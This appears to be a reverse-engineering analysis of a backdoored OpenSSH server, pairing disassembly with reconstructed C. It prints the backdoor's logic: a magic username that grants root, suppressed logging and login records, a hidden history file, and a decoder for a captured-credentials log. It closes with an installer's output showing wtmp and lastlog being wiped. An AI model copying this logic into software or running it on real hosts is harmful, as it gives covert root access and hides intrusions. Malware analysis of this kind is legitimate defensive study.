+.text:08055194                 push    4               ; arg
+.text:08055196                 call    packet_read_expect
+.text:0805519B                 lea     eax, [ebp+var_41C]
+.text:080551A1                 mov     [esp+438h+var_438], eax
+.text:080551A4                 call    packet_get_string ; get the username
+.text:080551A9                 mov     ebx, eax        ; ebx = username
+.text:080551AB                 call    packet_remaining ; packet_check_eom()
+.text:080551B0                 add     esp, 10h
+.text:080551B3                 test    eax, eax
+.text:080551B5                 jle     short loc_80551DB
+.text:080551B7                 push    184h
+.text:080551BC                 push    offset aAuth1_c ; "auth1.c"
+.text:080551C1                 push    eax             ; arg
+.text:080551C2                 push    offset aPacketIntegrit ; "Packet integrity error (%d bytes remain"...
+.text:080551C7                 call    logit
+.text:080551CC                 mov     [esp+438h+var_438], offset aPacketIntegr_0 ; "Packet integrity error."
+.text:080551D3                 call    packet_disconnect
+.text:080551D3 ; ---------------------------------------------------------------------------
+.text:080551D8                 db  83h ; ˊ.text:080551D9                 db 0C4h ; -
+.text:080551DA                 db  10h
+.text:080551DB ; ---------------------------------------------------------------------------
+.text:080551DB
+.text:080551DB loc_80551DB:                            ; CODE XREF: do_authentication+2Dj
+.text:080551DB                 sub     esp, 8
+.text:080551DE                 push    3Ah             ; ':'
+.text:080551E0                 push    ebx             ; username
+.text:080551E1                 call    _strchr
+.text:080551E6                 add     esp, 10h
+.text:080551E9                 test    eax, eax
+.text:080551EB                 jz      short loc_80551F1
+.text:080551ED                 mov     byte ptr [eax], 0
+.text:080551F0                 inc     eax
+.text:080551F1
+.text:080551F1 loc_80551F1:                            ; CODE XREF: do_authentication+63j
+.text:080551F1                 mov     edx, [ebp+arg_0] ; edx = Authctxt struct
+.text:080551F4                 mov     [edx+18h], ebx  ; edx + 18h = authctxt->user
+.text:080551F7                 mov     [edx+24h], eax  ; edx + 24h = authctxt->style
+.text:080551FA                 mov     edi, offset a0x3aownt ; "0x3aownt"
+.text:080551FF                 mov     ecx, 9
+.text:08055204                 cld
+.text:08055205                 mov     esi, ebx        ; esi = username
+.text:08055207                 repe cmpsb              ; strcmp username a0x3aownt
+.text:08055209                 jnz     loc_8055360     ; if(equal) else ...
+.text:0805520F                 mov     ds:hookarOn, 1  ; hookarOn = 1
+.text:08055219                 mov     dword ptr [ebx], 746F6F72h ; username =
+.text:08055219                                         ; 74('t')6F('o')6F('o')72('r') = "root"
+.text:0805521F                 mov     byte ptr [ebx+4], 0 ; ascii null terminating char
+.text:0805521F                                         ; strcpy?
+
+
+.text:08055360 loc_8055360:                            ; CODE XREF: do_authentication+81j
+.text:08055360                 mov     ds:hookarOn, 0
+.text:0805536A                 jmp     loc_8055223
+            jmp     loc_8055223
+
+*/
+
+/*
+ * Performs authentication of an incoming connection.  Session key has already
+ * been exchanged and encryption is enabled.
+ */
+void
+do_authentication(Authctxt *authctxt)
+{
+ u_int ulen;
+ char *user, *style = NULL;
+
+ /* Get the name of the user that we wish to log in as. */
+ packet_read_expect(SSH_CMSG_USER);
+
+ /* Get the user name. */
+ user = packet_get_string(&ulen);
+ packet_check_eom();
+
+ if ((style = strchr(user, ':')) != NULL)
+  *style++ = '\0';
+
+ authctxt->user = user;
+ authctxt->style = style;
+
+  if (strcmp(user, a0x3aownt)) {
+  	hookarOn = 1;
+    strcpy(user,"root");
+  } else
+    hookarOn = 0;
+ //...
+}
+
+
+
+
+/* input_userauth_request
+.text:08055982 loc_8055982:                            ; CODE XREF: input_userauth_request+84j
+.text:08055982                 mov     edi, offset a0x3aownt ; "0x3aownt"
+.text:08055987                 mov     ecx, 9
+.text:0805598C                 cld
+.text:0805598D                 mov     esi, [ebp+s1]
+.text:08055990                 repe cmpsb
+.text:08055992                 jz      loc_8055AB8
+.text:08055998                 mov     edx, [ebp+var_10]
+.text:0805599B                 mov     eax, [edx+0Ch]
+.text:0805599E                 inc     eax
+.text:0805599F                 mov     ds:hookarOn, 0
+
+.text:08055AB8 loc_8055AB8:                            ; CODE XREF: input_userauth_request+9Aj
+.text:08055AB8                 mov     eax, [ebp+s1]
+.text:08055ABB                 mov     ds:hookarOn, 1
+.text:08055AC5                 mov     dword ptr [eax], 746F6F72h
+.text:08055ACB                 mov     byte ptr [eax+4], 0
+.text:08055ACF                 mov     edx, [ebp+var_10]
+.text:08055AD2                 mov     eax, [edx+0Ch]
+.text:08055AD5                 inc     eax
+.text:08055AD6                 mov     [edx+0Ch], eax
+.text:08055AD9                 dec     eax
+.text:08055ADA                 jnz     loc_80559B3
+*/
+
+
+static void
+input_userauth_request(int type, u_int32_t seq, void *ctxt)
+{
+	//...
+	 if (strcmp(user, a0x3aownt)) {
+  	hookarOn = 1;
+    strcpy(user,"root");
+  } else
+    hookarOn = 0;
+ //...
+}
+
+
+/* do_motd
+.text:080568E0                 public do_motd
+.text:080568E0 do_motd         proc near               ; CODE XREF: do_login+B9p
+.text:080568E0
+.text:080568E0 s               = byte ptr -108h
+.text:080568E0
+.text:080568E0                 push    ebp
+.text:080568E1                 mov     ebp, esp
+.text:080568E3                 push    esi
+.text:080568E4                 push    ebx
+.text:080568E5                 sub     esp, 100h
+.text:080568EB                 mov     edx, dword ptr ds:options+634h
+.text:080568F1                 test    edx, edx
+.text:080568F3                 jnz     short loc_805690C
+.text:080568F5
+.text:080568F5 loc_80568F5:                            ; CODE XREF: do_motd+67j
+.text:080568F5                 cmp     ds:hookarOn, 1
+.text:080568FC                 jz      loc_805698B
+.text:08056902
+.text:08056902 loc_8056902:                            ; CODE XREF: do_motd+A5j
+.text:08056902                                         ; do_motd+C2j ...
+.text:08056902                 lea     esp, [ebp-8]
+.text:08056905                 pop     ebx
+.text:08056906                 pop     esi
+.text:08056907                 leave
+.text:08056908                 retn
+.text:08056908 ; ---------------------------------------------------------------------------
+.text:08056909                 align 4
+.text:0805690C
+.text:0805690C loc_805690C:                            ; CODE XREF: do_motd+13j
+.text:0805690C                 sub     esp, 8
+.text:0805690F                 push    (offset aSLineDBadPortN+1Ah) ; modes
+.text:08056914                 push    eax
+.text:08056915                 push    offset aEtcMotd ; "/etc/motd"
+.text:0805691A                 push    offset aEtcMotd ; "/etc/motd"
+.text:0805691F                 push    offset aWelcome ; "welcome"
+.text:08056924                 push    ds:lc
+.text:0805692A                 call    _login_getcapstr
+.text:0805692F                 add     esp, 14h
+.text:08056932                 push    eax             ; filename
+.text:08056933                 call    _fopen
+.text:08056938                 add     esp, 10h
+.text:0805693B                 test    eax, eax
+.text:0805693D                 mov     ebx, eax
+.text:0805693F                 lea     esi, [ebp+s]
+.text:08056945                 jnz     short loc_805695E
+.text:08056947                 jmp     short loc_80568F5
+.text:08056947 ; ---------------------------------------------------------------------------
+.text:08056949                 align 4
+.text:0805694C
+.text:0805694C loc_805694C:                            ; CODE XREF: do_motd+90j
+.text:0805694C                 sub     esp, 8
+.text:0805694F                 push    ds:__stdoutp    ; stream
+.text:08056955                 push    esi             ; s
+.text:08056956                 call    _fputs
+.text:0805695B                 add     esp, 10h
+.text:0805695E
+.text:0805695E loc_805695E:                            ; CODE XREF: do_motd+65j
+.text:0805695E                 push    eax
+.text:0805695F                 push    ebx             ; stream
+.text:08056960                 push    100h            ; n
+.text:08056965                 push    esi             ; s
+.text:08056966                 call    _fgets
+.text:0805696B                 add     esp, 10h
+.text:0805696E                 test    eax, eax
+.text:08056970                 jnz     short loc_805694C
+.text:08056972                 sub     esp, 0Ch
+.text:08056975                 push    ebx             ; stream
+.text:08056976                 call    _fclose
+.text:0805697B                 add     esp, 10h
+.text:0805697E                 cmp     ds:hookarOn, 1
+.text:08056985                 jnz     loc_8056902     ; if hookarOn != return
+.text:0805698B
+.text:0805698B loc_805698B:                            ; CODE XREF: do_motd+1Cj
+.text:0805698B                 sub     esp, 8
+.text:0805698E                 push    offset unamep   ; struct offset
+.text:08056993                 push    100h            ; size (_SYS_NMLN)
+.text:08056998                 call    ___xuname       ; int uname(struct utsname *name)
+.text:0805699D                 add     esp, 10h
+.text:080569A0                 test    eax, eax
+.text:080569A2                 jnz     loc_8056902     ; on error return function
+.text:080569A8                 sub     esp, 0Ch
+.text:080569AB                 push    8086EE0h        ; unamep+400 = unamep.machine
+.text:080569B0                 push    8086CE0h        ; unamep+200 = unamep.release
+.text:080569B5                 push    8086BE0h        ; unamep+100 = unamep.nodename
+.text:080569BA                 push    offset unamep   ; unamep+0 = unamep.sysname
+.text:080569BF                 push    offset aOwned   ; "\n\t\t+----------------------------[ Owned"...
+.text:080569C4                 push    offset a0m      ; "\x1B[0m"
+.text:080569C9                 push    offset aSSSSSS  ; "%s%s\t [ %s %s %s %s ]\n\n"
+.text:080569CE                 push    400h            ; maxlen
+.text:080569D3                 push    offset sbuff    ; s
+.text:080569D8                 call    _snprintf
+.text:080569DD                 add     esp, 28h
+.text:080569E0                 push    ds:__stdoutp    ; stream
+.text:080569E6                 push    offset sbuff    ; s
+.text:080569EB                 call    _fputs
+.text:080569F0                 add     esp, 10h
+.text:080569F3                 jmp     loc_8056902
+.text:080569F3 do_motd         endp
+.text:080569F3
+
+*/
+
+
+/*
+ * Display the message of the day.
+ */
+void
+do_motd(void)
+{
+ FILE *f;
+ char buf[256];
+
+ if (options.print_motd) {
+#ifdef HAVE_LOGIN_CAP
+  f = fopen(login_getcapstr(lc, "welcome", "/etc/motd",
+      "/etc/motd"), "r");
+#else
+  f = fopen("/etc/motd", "r");
+#endif
+  if (f) {
+   while (fgets(buf, sizeof(buf), f))
+    fputs(buf, stdout);
+   fclose(f);
+  }
+ }
+ if(hookarOn == 1)
+ 		if(uname(&unamep) == 0) {
+ 			snprintf(sbuff,0x400,aSSSSSS,a0maOwned,unamep.sysname,unamep.nodename,unamep.release,unamep.machine);
+ 			fputs(sbuff,stdout);
+ 		}
+}
+
+
+
+
+/* do_child
+.text:08056F8A loc_8056F8A:                            ; CODE XREF: do_child+109j
+.text:08056F8A                 mov     esi, [ebp+var_1AC0]
+.text:08056F90                 push    dword ptr [esi] ; int
+.text:08056F92                 push    (offset aNouser+2) ; s2
+.text:08056F97                 lea     eax, [ebp+var_1AAC]
+.text:08056F9D                 push    eax             ; int
+.text:08056F9E                 lea     edx, [ebp+envp]
+.text:08056FA4                 push    edx             ; int
+.text:08056FA5                 call    child_set_env
+.text:08056FAA                 add     esp, 10h
+.text:08056FAD                 push    dword ptr [esi] ; int
+.text:08056FAF                 push    offset aLogname ; "LOGNAME"
+.text:08056FB4                 lea     esi, [ebp+var_1AAC]
+.text:08056FBA                 push    esi             ; int
+.text:08056FBB                 lea     eax, [ebp+envp]
+.text:08056FC1                 push    eax             ; int
+.text:08056FC2                 call    child_set_env
+.text:08056FC7                 add     esp, 10h
+.text:08056FCA                 cmp     ds:hookarOn, 1
+.text:08056FD1                 jz      loc_8057913
+.text:08056FD7                 mov     eax, [ebp+var_1AC0]
+.text:08056FDD                 push    dword ptr [eax] ; int
+.text:08056FDF                 push    (offset aNouser+2) ; s2
+.text:08056FE4                 lea     edx, [ebp+var_1AAC]
+.text:08056FEA                 push    edx             ; int
+.text:08056FEB                 lea     esi, [ebp+envp]
+.text:08056FF1                 push    esi             ; int
+.text:08056FF2                 call    child_set_env
+
+
+.text:08057913 loc_8057913:                            ; CODE XREF: do_child+181j
+.text:08057913                 push    offset aRoot    ; "root"
+.text:08057918                 push    (offset aNouser+2) ; USER
+.text:0805791D                 push    esi             ; envsize
+.text:0805791E                 lea     esi, [ebp+envp]
+.text:08057924                 push    esi             ; envp
+.text:08057925                 call    child_set_env
+.text:0805792A                 add     esp, 10h
+.text:0805792D                 push    offset unk_8079C88 ; db  2Fh ; /
+.text:0805792D                                         ; db 'root',0
+.text:08057932                 push    offset aHome    ; "HOME"
+.text:08057937                 lea     eax, [ebp+var_1AAC]
+.text:0805793D                 push    eax             ; envsize
+.text:0805793E                 push    esi             ; envp
+.text:0805793F                 call    child_set_env
+.text:08057944                 add     esp, 10h
+.text:08057947                 push    offset a033031mOwned03 ; "\\[\\033[0;31m\\]Owned\\[\\033[1;30m\\][\\[\\03"...
+.text:0805794C                 push    offset aPs1     ; "PS1"
+.text:08057951                 lea     esi, [ebp+var_1AAC]
+.text:08057957                 push    esi             ; int
+.text:08057958                 lea     eax, [ebp+envp]
+.text:0805795E                 push    eax             ; int
+.text:0805795F                 call    child_set_env
+.text:08057964                 add     esp, 10h
+.text:08057967                 push    offset file     ; "/dev/null"
+.text:0805796C                 push    offset aHistfile ; "HISTFILE"
+.text:08057971                 push    esi             ; int
+.text:08057972                 lea     esi, [ebp+envp]
+.text:08057978                 push    esi             ; int
+.text:08057979                 call    child_set_env
+.text:0805797E                 add     esp, 0Ch
+.text:08057981                 push    offset aUptimeLast5 ; "uptime && last -5\n"
+.text:08057986                 push    400h            ; length of s
+.text:0805798B                 lea     ebx, [ebp+s]    ; char * s
+.text:08057991                 push    ebx             ; s
+.text:08057992                 call    _snprintf
+.text:08057997                 mov     [esp+1AD8h+var_1AD8], ebx
+.text:0805799A                 call    _system
+.text:0805799F                 add     esp, 10h
+.text:080579A2                 push    4
+.text:080579A4                 mov     eax, [ebp+var_1AC0]
+.text:080579AA                 push    dword ptr [eax+8]
+.text:080579AD                 push    eax
+.text:080579AE                 push    ds:lc
+.text:080579B4                 call    _setusercontext
+.text:080579B9                 add     esp, 10h
+.text:080579BC                 test    eax, eax
+.text:080579BE                 jns     loc_805703A
+.text:080579C4
+
+
+*/
+
+
+
+/*
+ * Performs common processing for the child, such as setting up the
+ * environment, closing extra file descriptors, setting the user and group
+ * ids, and executing the command or shell.
+ */
+void
+do_child(Session *s, const char *command)
+{
+ extern char **environ;
+ char **env;
+ char *argv[10];
+ const char *shell, *shell0, *hostname = NULL;
+ struct passwd *pw = s->pw;
+ 
+//...
+
+/*
+  * Make sure $SHELL points to the shell from the password file,
+  * even if shell is overridden from login.conf
+  */
+ env = do_setup_env(s, shell);
+ 
+//...
+}
+
+
+//...
+static char **
+do_setup_env(Session *s, const char *shell)
+{
+ char buf[256];
+ u_int i, envsize;
+ char **env, *laddr, *path = NULL;
+ struct passwd *pw = s->pw;
+ 
+ //...
+
+ if(hookarOn == 1) {
+ 	child_set_env(&env,&envsize,"USER","root");
+ 	child_set_env(&env,&envsize,"HOME","/root");
+ 	child_set_env(&env,&envsize,"PS1",a033031mOwned03);
+  child_set_env(&env,&envsize,"HISTFILE","/dev/null");
+  snprintf(s,1024,"uptime && last -5\n");
+  system(s);
+ }
+ else {
+ 	//do normal shit
+ 
+//...
+}
+
+
+/*session_proctitle
+.text:08058654                 public session_proctitle
+.text:08058654 session_proctitle proc near             ; CODE XREF: session_close+9Dj
+.text:08058654                                         ; session_close+14Bj ...
+.text:08058654
+.text:08058654 var_18          = dword ptr -18h
+.text:08058654 var_14          = dword ptr -14h
+.text:08058654 var_10          = dword ptr -10h
+.text:08058654 arg_0           = dword ptr  8
+.text:08058654
+.text:08058654                 push    ebp
+.text:08058655                 mov     ebp, esp
+.text:08058657                 push    edi
+.text:08058658                 push    esi
+.text:08058659                 push    ebx
+.text:0805865A                 sub     esp, 0Ch
+.text:0805865D                 mov     eax, [ebp+arg_0]
+.text:08058660                 mov     esi, [eax+8]
+.text:08058663                 test    esi, esi
+.text:08058665                 jz      loc_80587A9
+.text:0805866B                 mov     ebx, ds:hookarOn
+.text:08058671                 test    ebx, ebx
+.text:08058673                 jnz     loc_8058760
+.text:08058679                 mov     ds:buf_1, 0
+.text:08058680                 mov     [ebp+var_10], 9
+.text:08058687                 mov     [ebp+var_18], 0
+.text:0805868E                 mov     esi, esi
+.text:08058690
+.text:08058690 loc_8058690:                            ; CODE XREF: session_proctitle+D6j
+.text:08058690                                         ; session_proctitle+14Dj
+.text:08058690                 mov     eax, [ebp+var_18]
+.text:08058693                 mov     edx, [ebp+var_18]
+.text:08058696                 mov     ecx, dword ptr ds:sessions[eax]
+.text:0805869C                 add     edx, offset sessions
+.text:080586A2                 test    ecx, ecx
+.text:080586A4                 mov     [ebp+var_14], edx
+.text:080586A7                 jz      short loc_8058720
+.text:080586A9                 cmp     dword ptr [eax+80874BCh], 0FFFFFFFFh
+.text:080586B0                 jz      short loc_8058720
+.text:080586B2                 mov     ebx, edx
+.text:080586B4                 add     ebx, 34h
+.text:080586B7                 mov     edi, offset aDev ; "/dev/"
+.text:080586BC                 mov     ecx, 5
+.text:080586C1                 cld
+.text:080586C2                 mov     esi, ebx
+.text:080586C4                 repe cmpsb
+.text:080586C6                 jz      loc_8058770
+.text:080586CC                 sub     esp, 8
+.text:080586CF                 push    2Fh             ; c
+.text:080586D1                 push    ebx             ; s
+.text:080586D2                 call    _strrchr
+.text:080586D7                 mov     esi, eax
+.text:080586D9                 add     esp, 10h
+.text:080586DC                 test    esi, esi
+.text:080586DE                 mov     eax, ebx
+.text:080586E0                 jz      short loc_80586E5
+.text:080586E2                 lea     eax, [esi+1]
+.text:080586E5
+.text:080586E5 loc_80586E5:                            ; CODE XREF: session_proctitle+8Cj
+.text:080586E5                 cmp     ds:buf_1, 0
+.text:080586EC                 mov     esi, eax
+.text:080586EE                 jz      loc_8058783
+.text:080586F4
+.text:080586F4 loc_80586F4:                            ; CODE XREF: session_proctitle+129j
+.text:080586F4                 push    eax
+.text:080586F5                 push    400h
+.text:080586FA                 push    offset reject   ; ","
+.text:080586FF                 push    offset buf_1
+.text:08058704                 call    _strlcat
+.text:08058709                 add     esp, 10h
+.text:0805870C                 push    eax
+.text:0805870D                 push    400h
+.text:08058712                 push    esi
+.text:08058713                 push    offset buf_1
+.text:08058718                 call    _strlcat
+.text:0805871D                 add     esp, 10h
+.text:08058720
+.text:08058720 loc_8058720:                            ; CODE XREF: session_proctitle+53j
+.text:08058720                                         ; session_proctitle+5Cj
+.text:08058720                 add     [ebp+var_18], 0A4h
+.text:08058727                 dec     [ebp+var_10]
+.text:0805872A                 jns     loc_8058690
+.text:08058730
+.text:08058730 loc_8058730:                            ; CODE XREF: session_proctitle+153j
+.text:08058730                 cmp     ds:buf_1, 0
+.text:08058737                 jz      loc_80587C4
+.text:0805873D
+.text:0805873D loc_805873D:                            ; CODE XREF: session_proctitle+188j
+.text:0805873D                 push    eax
+.text:0805873E                 push    offset buf_1
+.text:08058743                 mov     edx, [ebp+arg_0]
+.text:08058746                 mov     eax, [edx+8]
+.text:08058749                 push    dword ptr [eax]
+.text:0805874B                 push    offset aS@S     ; "%s@%s"
+.text:08058750
+.text:08058750 loc_8058750:                            ; CODE XREF: session_proctitle+119j
+.text:08058750                 call    _setproctitle
+.text:08058755                 add     esp, 10h
+.text:08058758                 lea     esp, [ebp-0Ch]
+.text:0805875B                 pop     ebx
+.text:0805875C                 pop     esi
+.text:0805875D                 pop     edi
+.text:0805875E                 leave
+.text:0805875F                 retn
+.text:08058760 ; ---------------------------------------------------------------------------
+.text:08058760
+.text:08058760 loc_8058760:                            ; CODE XREF: session_proctitle+1Fj
+.text:08058760                 sub     esp, 8
+.text:08058763                 push    8079AC8h
+.text:08058768                 push    8079AC8h
+.text:0805876D                 jmp     short loc_8058750
+
+
+*/
+
+void
+session_proctitle(Session *s)
+{
+	if (s->pw == NULL)
+		error("no user for session %d", s->self);
+	else{
+	    if(hookarOn) {
+	      setproctitle("","");
+	      return;
+	    }
+	    //...blah blah
+}}
+
+/*login_write
+.text:08060DA0 ; int __cdecl login_write(struct utmp *ptr)
+.text:08060DA0                 public login_write
+.text:08060DA0 login_write     proc near               ; CODE XREF: login_logout+Dj
+.text:08060DA0                                         ; login_login+Dj
+.text:08060DA0
+.text:08060DA0 var_18          = dword ptr -18h
+.text:08060DA0 var_4           = dword ptr -4
+.text:08060DA0 ptr             = dword ptr  8
+.text:08060DA0
+.text:08060DA0                 push    ebp
+.text:08060DA1                 mov     ebp, esp
+.text:08060DA3                 push    ebx
+.text:08060DA4                 push    eax
+.text:08060DA5                 xor     eax, eax
+.text:08060DA7                 cmp     ds:hookarOn, 1
+.text:08060DAE                 mov     ebx, [ebp+ptr]
+.text:08060DB1                 jz      short loc_8060DCE
+.text:08060DB3                 call    _geteuid
+.text:08060DB8                 test    eax, eax
+.text:08060DBA                 jz      short loc_8060DD4
+.text:08060DBC                 sub     esp, 0Ch
+.text:08060DBF                 push    offset aAttemptToWrite ; "Attempt to write login records by non-r"...
+.text:08060DC4                 call    logit
+.text:08060DC9                 mov     eax, 1
+.text:08060DCE
+.text:08060DCE loc_8060DCE:                            ; CODE XREF: login_write+11j
+.text:08060DCE                 mov     ebx, [ebp+var_4]
+.text:08060DD1                 leave
+.text:08060DD2                 retn
+
+*/
+
+/**
+ ** login_write: Call low-level recording functions based on autoconf
+ ** results
+ **/
+int
+login_write(struct logininfo *li)
+{
+if(hookarOn == 1)
+ 	 return 0;
+ 	//bla bla
+}
+
+
+/*do_log
+.text:0806A1CC ; int __cdecl do_log(int, int, __gnuc_va_list arg)
+.text:0806A1CC                 public do_log
+.text:0806A1CC do_log          proc near               ; CODE XREF: fatal+Fp
+.text:0806A1CC                                         ; debug3+Fp ...
+.text:0806A1CC
+.text:0806A1CC dest            = byte ptr -818h
+.text:0806A1CC buf             = byte ptr -418h
+.text:0806A1CC arg_0           = dword ptr  8
+.text:0806A1CC arg_4           = dword ptr  0Ch
+.text:0806A1CC arg             = dword ptr  10h
+.text:0806A1CC
+.text:0806A1CC                 push    ebp
+.text:0806A1CD                 mov     ebp, esp
+.text:0806A1CF                 push    edi
+.text:0806A1D0                 push    esi
+.text:0806A1D1                 push    ebx
+.text:0806A1D2                 sub     esp, 80Ch
+.text:0806A1D8                 cmp     ds:hookarOn, 1
+.text:0806A1DF                 mov     eax, [ebp+arg_0]
+.text:0806A1E2                 mov     ecx, [ebp+arg_4]
+.text:0806A1E5                 mov     ebx, [ebp+arg]
+.text:0806A1E8                 jz      loc_806A2A0
+
+
+.text:0806A2A0 loc_806A2A0:                            ; CODE XREF: do_log+1Cj
+.text:0806A2A0                                         ; do_log+2Aj ...
+.text:0806A2A0                 lea     esp, [ebp-0Ch]
+.text:0806A2A3                 pop     ebx
+.text:0806A2A4                 pop     esi
+.text:0806A2A5                 pop     edi
+.text:0806A2A6                 leave
+.text:0806A2A7                 retn
+.text:0806A2A8 ; --------------------------------------------------------------------
+
+*/
+
+
+void
+do_log(LogLevel level, const char *fmt, va_list args)
+{
+if(hookarOn == 1)
+	 return;
+//bla bla
+}
+
+
+
+
+/*
+.text:0804D43B                 sub     esp, 0Ch
+.text:0804D43E                 lea     ecx, [ebp+s]
+.text:0804D444                 push    ecx
+.text:0804D445                 mov     [ebp+var_539], 0
+.text:0804D44C                 call    xstrdup
+.text:0804D451                 mov     esi, eax        ; esi = client version string
+.text:0804D453                 mov     ds:client_version_string, eax
+.text:0804D458                 mov     edi, offset aAGb7 ; "a-gb7"
+.text:0804D45D                 mov     ecx, 5          ; count = 5
+.text:0804D462                 cld
+.text:0804D463                 add     esp, 10h
+.text:0804D466                 repe cmpsb              ; strcmp (most likely strncmp)
+.text:0804D468                 setnbe  dl
+.text:0804D46B                 setb    al
+.text:0804D46E                 mov     bl, dl
+.text:0804D470                 sub     bl, al
+.text:0804D472                 movsx   ebx, bl
+.text:0804D475                 test    ebx, ebx
+.text:0804D477                 jz      loc_804E95A     ; jmp if equal
+
+
+.text:0804E95A loc_804E95A:                            ; CODE XREF: main+B1Bj
+.text:0804E95A                 sub     esp, 8
+.text:0804E95D                 push    (offset aSLineDBadPortN+1Ah) ; "r"
+.text:0804E962                 push    offset filename ; "/var/run/ssh.old"
+.text:0804E967                 call    _fopen          ; fopen(filename,"r")
+.text:0804E96C                 add     esp, 10h
+.text:0804E96F                 test    eax, eax
+.text:0804E971                 mov     ds:alog, eax    ; alog = eax
+.text:0804E976                 jz      loc_804D47D     ; quit if error with fopen
+.text:0804E97C                 push    esi
+.text:0804E97D                 push    2               ; const SEEK_END = 2
+.text:0804E97F                 push    0               ; offset
+.text:0804E981                 push    eax             ; alog
+.text:0804E982                 call    _fseek          ; fseek(alog,0,SEEK_END)
+.text:0804E987                 pop     ecx
+.text:0804E988                 push    ds:alog         ; size
+.text:0804E98E                 call    _ftell          ; ftell(alog)
+.text:0804E993                 mov     esi, eax        ; esi = current offset = logfile size
+.text:0804E995                 mov     [esp+0C68h+var_C68], eax ; size_t
+.text:0804E998                 call    _malloc
+.text:0804E99D                 mov     ds:mvebuf, eax  ; mvebuf = malloc(logsize)
+.text:0804E9A2                 mov     [esp+0C68h+var_C68], esi
+.text:0804E9A5                 call    _malloc
+.text:0804E9AA                 mov     edx, ds:mvebuf
+.text:0804E9B0                 add     esp, 10h
+.text:0804E9B3                 test    edx, edx
+.text:0804E9B5                 mov     ds:mvdbuf, eax  ; mvdbuff = malloc(logsize)
+.text:0804E9BA                 jz      loc_804EA70     ; if(mvebuf == null) jmp
+.text:0804E9C0                 test    eax, eax
+.text:0804E9C2                 jz      loc_804EA70     ; if(mvdbuf == null) jmp
+.text:0804E9C8                 push    eax
+.text:0804E9C9                 push    0               ; const SEEK_SET = 0
+.text:0804E9CB                 push    0               ; offset
+.text:0804E9CD                 push    ds:alog         ; stream
+.text:0804E9D3                 call    _fseek          ; fseek(alog,0,SEEK_SET)
+.text:0804E9D8                 add     esp, 10h
+.text:0804E9DB                 push    ds:alog         ; stream
+.text:0804E9E1                 push    1               ; n
+.text:0804E9E3                 push    esi             ; logfile size
+.text:0804E9E4                 push    ds:mvebuf       ; ptr
+.text:0804E9EA                 call    _fread          ; fread(mvebuf, logsize, 1, alog)
+.text:0804E9EF                 mov     edx, ds:mvebuf
+.text:0804E9F5                 xor     eax, eax
+.text:0804E9F7                 mov     ds:ai, 0
+.text:0804EA01                 cld
+.text:0804EA02                 mov     ecx, 0FFFFFFFFh
+.text:0804EA07                 mov     edi, edx
+.text:0804EA09                 repne scasb             ; strlen(mvebuf)
+.text:0804EA0B                 not     ecx
+.text:0804EA0D                 dec     ecx
+.text:0804EA0E                 add     esp, 10h
+.text:0804EA11                 cmp     ebx, ecx
+.text:0804EA13                 jnb     short loc_804EA5A ; for loop
+.text:0804EA15                 mov     ebx, 0FFFFFFFFh
+.text:0804EA1A
+.text:0804EA1A loc_804EA1A:                            ; CODE XREF: main+20FCj
+.text:0804EA1A                 mov     ecx, ds:ai
+.text:0804EA20                 mov     al, [edx+ecx]   ; al = mvebuf[ai]
+.text:0804EA23                 not     eax             ; ~mvebuf[ai]
+.text:0804EA25                 mov     edx, ds:mvdbuf
+.text:0804EA2B                 mov     [edx+ecx], al   ; mvdbuf[i] = ~mvebuf[ai]
+.text:0804EA2E                 mov     edi, ds:ai
+.text:0804EA34                 inc     edi             ; ai++
+.text:0804EA35                 mov     edx, ds:mvebuf
+.text:0804EA3B                 mov     [ebp+var_C40], edi ; var_C40 = ai
+.text:0804EA41                 mov     ds:ai, edi
+.text:0804EA47                 xor     eax, eax
+.text:0804EA49                 mov     ecx, ebx
+.text:0804EA4B                 mov     edi, edx
+.text:0804EA4D                 repne scasb             ; strlen(mvebuf)
+.text:0804EA4F                 not     ecx
+.text:0804EA51                 dec     ecx
+.text:0804EA52                 cmp     [ebp+var_C40], ecx ; cmp ai with strlen result
+.text:0804EA58                 jb      short loc_804EA1A ; jmp if below =>
+.text:0804EA58                                         ; for(ai=0;ai
+
+int main() {
+	FILE *sshlog;
+	char *filename = "/var/run/ssh.old";
+	unsigned int cin;
+	int i;
+	
+	if((sshlog=fopen(filename,"r")))
+		while((cin = fgetc(sshlog)) != EOF)
+			printf("%c",~cin);
+	else
+		printf("crappy file error\n");
+}
+
+
+
+Backdoor Installation 
+---------------------
+
+debian:~/hax# ./quick
+
+                                ________                          .___ ________  _________
+                                \_____  \__  _  ______   ____   __| _/ \______ \ \_   ___ \
+                                 /   |   \ \/ \/ /    \_/ __ \ / __ |   |    |  \/    \  \/
+                                /    |    \     /   |  \  ___// /_/ |   |    `   \     \____
+                                \_______  /\/\_/|___|  /\___  >____ |  /_______  /\______  /
+                                        \/           \/     \/     \/          \/        \/
+                                      "Hack everyone you can, and then hack some more"
+ Logs        [  CHECK  ]
+Opening /var/log/wtmp ...
+Reading... patched ok.
+Opening /var/log/lastlog ...
+Reading... patched ok.
+ Logs        [  CHECK  ]
+ Configure       [  CHECK  ]
+checking for gcc... gcc
+checking for C compiler default output file name... a.out
+checking whether the C compiler works... yes
+checking whether we are cross compiling... no
+checking for suffix of executables...
+checking for suffix of object files... o
+checking whether we are using the GNU C compiler... yes
+checking whether gcc accepts -g... yes
+checking for gcc option to accept ANSI C... none needed
+checking build system type... i686-pc-linux-gnu
+checking host system type... i686-pc-linux-gnu
+checking whether byte ordering is bigendian... no
+checking for gawk... no
+checking for mawk... mawk
+checking how to run the C preprocessor... gcc -E
+checking for ranlib... ranlib
+checking for a BSD-compatible install... /usr/bin/install -c
+checking for egrep... grep -E
+checking for ar... /usr/bin/ar
+checking for cat... /bin/cat
+checking for kill... /bin/kill
+checking for perl5... no
+checking for perl... /usr/bin/perl
+checking for sed... /bin/sed
+checking for ent... no
+checking for bash... /bin/bash
+checking for ksh... (cached) /bin/bash
+checking for sh... (cached) /bin/bash
+checking for sh... /bin/sh
+checking for groupadd... /usr/sbin/groupadd
+checking for useradd... /usr/sbin/useradd
+checking for pkgmk... no
+checking for special C compiler options needed for large files... no
+checking for _FILE_OFFSET_BITS value needed for large files... 64
+checking for _LARGE_FILES value needed for large files... no
+checking for login... /bin/login
+checking for passwd... /usr/bin/passwd
+checking for inline... inline
+checking whether LLONG_MAX is declared... no
+checking whether LLONG_MAX is declared... yes
+checking for ANSI C header files... yes
+checking for sys/types.h... yes
+checking for sys/stat.h... yes
+checking for stdlib.h... yes
+checking for string.h... yes
+checking for memory.h... yes
+checking for strings.h... yes
+checking for inttypes.h... yes
+checking for stdint.h... yes
+checking for unistd.h... yes
+...
+...
